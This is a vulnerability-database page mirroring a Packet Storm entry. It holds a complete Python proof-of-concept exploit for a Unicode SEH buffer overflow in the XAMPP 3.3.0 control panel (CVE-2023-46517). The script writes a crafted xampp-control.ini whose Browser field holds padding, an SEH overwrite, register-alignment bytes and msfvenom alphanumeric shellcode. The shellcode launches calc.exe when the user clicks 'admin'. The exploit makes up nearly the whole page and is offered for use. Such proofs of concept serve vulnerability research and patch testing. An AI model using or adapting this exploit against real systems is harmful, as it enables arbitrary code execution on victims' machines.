Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormTalsonPACKETSTORM:175381
HistoryOct 27, 2023 - 12:00 a.m.

XAMPP 3.3.0 Buffer Overflow

2023-10-2700:00:00
Talson
packetstormsecurity.com
273
xampp
buffer overflow
arbitrary code execution
'xampp-control.ini' file
control.ini modification
unicode
seh
windows 11
cve-2023-46517
exploit
python script
proof of concept
github
emu team

0 Low

EPSS

Percentile

0.0%

JSON
`# Exploit Title: XAMPP v3.3.0 — '.ini' Buffer Overflow (Unicode + SEH)  
# Date: 2023-10-26  
# Author: Talson (@Ripp3rdoc)  
# Software Link: https://sourceforge.net/projects/xampp/files/XAMPP%20Windows/8.0.28/xampp-windows-x64-8.0.28-0-VS16-installer.exe  
# Version: 3.3.0  
# Tested on: Windows 11  
# CVE-2023-46517  
  
##########################################################  
# _________ _______ _ _______ _______ _ #  
# \__ __/( ___ )( \ ( ____ \( ___ )( ( /| #  
# ) ( | ( ) || ( | ( \/| ( ) || \ ( | #  
# | | | (___) || | | (_____ | | | || \ | | #  
# | | | ___ || | (_____ )| | | || (\ \) | #  
# | | | ( ) || | ) || | | || | \ | #  
# | | | ) ( || (____/\/\____) || (___) || ) \ | #  
# )_( |/ \|(_______/\_______)(_______)|/ )_) #  
# #  
##########################################################  
  
# Proof of Concept:  
  
# 1.- Run the python script "poc.py", it will create a new file "xampp-control.ini"  
# 2.- Open the application (xampp-control.exe)  
# 3.- Click on the "admin" button in front of Apache service.  
# 4.- Profit  
  
# Proof-of-Concept code on GitHub: https://github.com/ripp3rdoc/XAMPPv3.3.0-BOF/  
  
# Greetingz to EMU TEAM (¬‿¬)⩙  
  
from pwn import *  
import shutil  
import os.path  
  
buffer = "\x41" * 268 # 268 bytes to fill the buffer  
nseh = "\x59\x71" # next SEH address — 0x00590071 (a harmless padding)  
seh = "\x15\x43" # SEH handler — 0x00430015: pop ecx ; pop ebp ; ret ;  
padd = "\x71" * 0x55 # padding  
  
eax_align = "\x47" # venetian pad/align  
eax_align += "\x51" # push ecx  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x58" # pop eax -> eax = 0019e1a0  
eax_align += "\x71" # venetian pad/align   
eax_align += "\x05\x24\x11" # add eax,0x11002300  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x2d\x11\x11" # sub eax,0x11001100 -> eax = 0019F3DC  
eax_align += "\x71" # venetian pad/align  
eax_align += "\x50" # push eax   
eax_align += "\x71" # pad to align the following ret  
eax_align += "\xc3"; # ret into eax?  
  
# msfvenom -p windows/exec CMD=calc.exe -e x86/unicode_mixed -f raw EXITFUNC=thread BufferRegister=EAX -o shellcode.bin  
# Payload size: 512 bytes  
shellcode = (  
"PPYAIAIAIAIAIAIAIAIAIAIAIAIAIAIAjXAQADAZABARALAYAIAQAIAQAIAhAAAZ1AIAIAJ11AIAIABABABQI1"  
"AIQIAIQI111AIAJQYAZBABABABABkMAGB9u4JBkLzHrbM0ipm0c0bi7u01Ep1TBkb0nPdKR2zlrknrKdDK42Kx"  
"Jo6WpJnFLqiofLMl1QallBLlO0gQxOzmjagW7rZRObpWBkNrZpdKMzmlBkNlzq1hZC0HKQwab1dKQIKp9qiCrk"  
"myKhGslzoYtKMdTKkQJ6ma9odlgQ8OJmM1vg08iPD5yfjcSMjXOKQmnDRUhdaH4KR8mTIq7c2FDKjlpKrkaHML"  
"JaZ3dKItrkYqhPU9MtO4KtOk1KC1QI1JNqKO9P1OOoqJtKn2HkRmOmaZjatMbe7BYpm0kPR0PhmadKRODGioj57"  
"KgpmMnJZjoxDfceemCmYo9EmlivcL9zE0ikWpQe9ugKoWKcprpo2Jip23KOHUQSaQ0l33Lns5PxrEKPAA"  
)  
  
shellcode = buffer + nseh + seh + eax_align + padd + shellcode  
  
  
check_file = os.path.isfile("c:\\xampp\\xampp-control.ini")  
  
if check_file:  
  
print("[!] Backup file found. Generating the POC file...")  
pass  
else:   
# create backup  
try:  
shutil.copyfile("c:\\xampp\\xampp-control.ini", "c:\\xampp\\xampp-control.ini.bak")  
print("[+] Creating backup for xampp-control.ini...")  
print("[+] Backup file created!")  
except Exception as e:  
print("[!] Failed creating a backup for xampp-control.ini: ", e)  
  
try:  
  
# Create the new file  
with open("c:\\xampp\\xampp-control.ini", "w", encoding='utf-8') as file:  
file.write(f"""[Common]  
Edition=  
Editor=  
Browser={shellcode}  
  
Debug=0  
Debuglevel=0  
Language=en  
TomcatVisible=1  
Minimized=0  
  
[LogSettings]  
Font=Arial  
FontSize=10  
  
[WindowSettings]  
Left=-1  
Top=-1  
Width=682  
Height=441  
  
[Autostart]  
Apache=0  
MySQL=0  
FileZilla=0  
Mercury=0  
Tomcat=0  
  
[Checks]  
CheckRuntimes=1  
CheckDefaultPorts=1  
  
[ModuleNames]  
Apache=Apache  
MySQL=MySQL  
Mercury=Mercury  
Tomcat=Tomcat  
  
[EnableModules]  
Apache=1  
MySQL=1  
FileZilla=1  
Mercury=1  
Tomcat=1  
  
[EnableServices]  
Apache=1  
MySQL=1  
FileZilla=1  
Tomcat=1  
  
[BinaryNames]  
Apache=httpd.exe  
MySQL=mysqld.exe  
FileZilla=filezillaserver.exe  
FileZillaAdmin=filezilla server interface.exe  
Mercury=mercury.exe  
Tomcat=tomcat8.exe  
  
[ServiceNames]  
Apache=Apache2.4  
MySQL=mysql  
FileZilla=FileZillaServer  
Tomcat=Tomcat  
[ServicePorts]  
Apache=80  
ApacheSSL=443  
MySQL=3306  
FileZilla=21  
FileZill=14147  
Mercury1=25  
Mercury2=79  
Mercury3=105  
Mercury4=106  
Mercury5=110  
Mercury6=143  
Mercury7=2224  
TomcatHTTP=8080  
TomcatAJP=8009  
Tomcat=8005  
[UserConfigs]  
Apache=   
MySQL=  
FileZilla=  
Mercury=  
Tomcat=  
  
[UserLogs]  
Apache=  
MySQL=  
FileZilla=  
Mercury=  
Tomcat=  
""")  
print("[+] Created the POC!")  
  
except Exception as e:  
print("[!] Failed creating the POC xampp-control.ini: ", e)  
`

Related

nvd 1
cvelist 1
cve 1
exploitdb 1
zdt 2
nvd
nvd
CVE-2023-46517
2023-11-03 05:15:30
cvelist
cvelist
CVE-2023-46517
1976-01-01 00:00:00
cve
cve
CVE-2023-46517
2023-11-03 05:15:30
exploitdb
exploitdb
XAMPP - Buffer Overflow POC
2024-02-19 00:00:00
zdt
zdt
XAMPP 3.3.0 Buffer Overflow Exploit
2023-10-30 00:00:00
XAMPP - Buffer Overflow Exploit
2024-02-19 00:00:00

0 Low

EPSS

Percentile

0.0%

JSON
Related for PACKETSTORM:175381
nvd1cvelist1cve1exploitdb1zdt2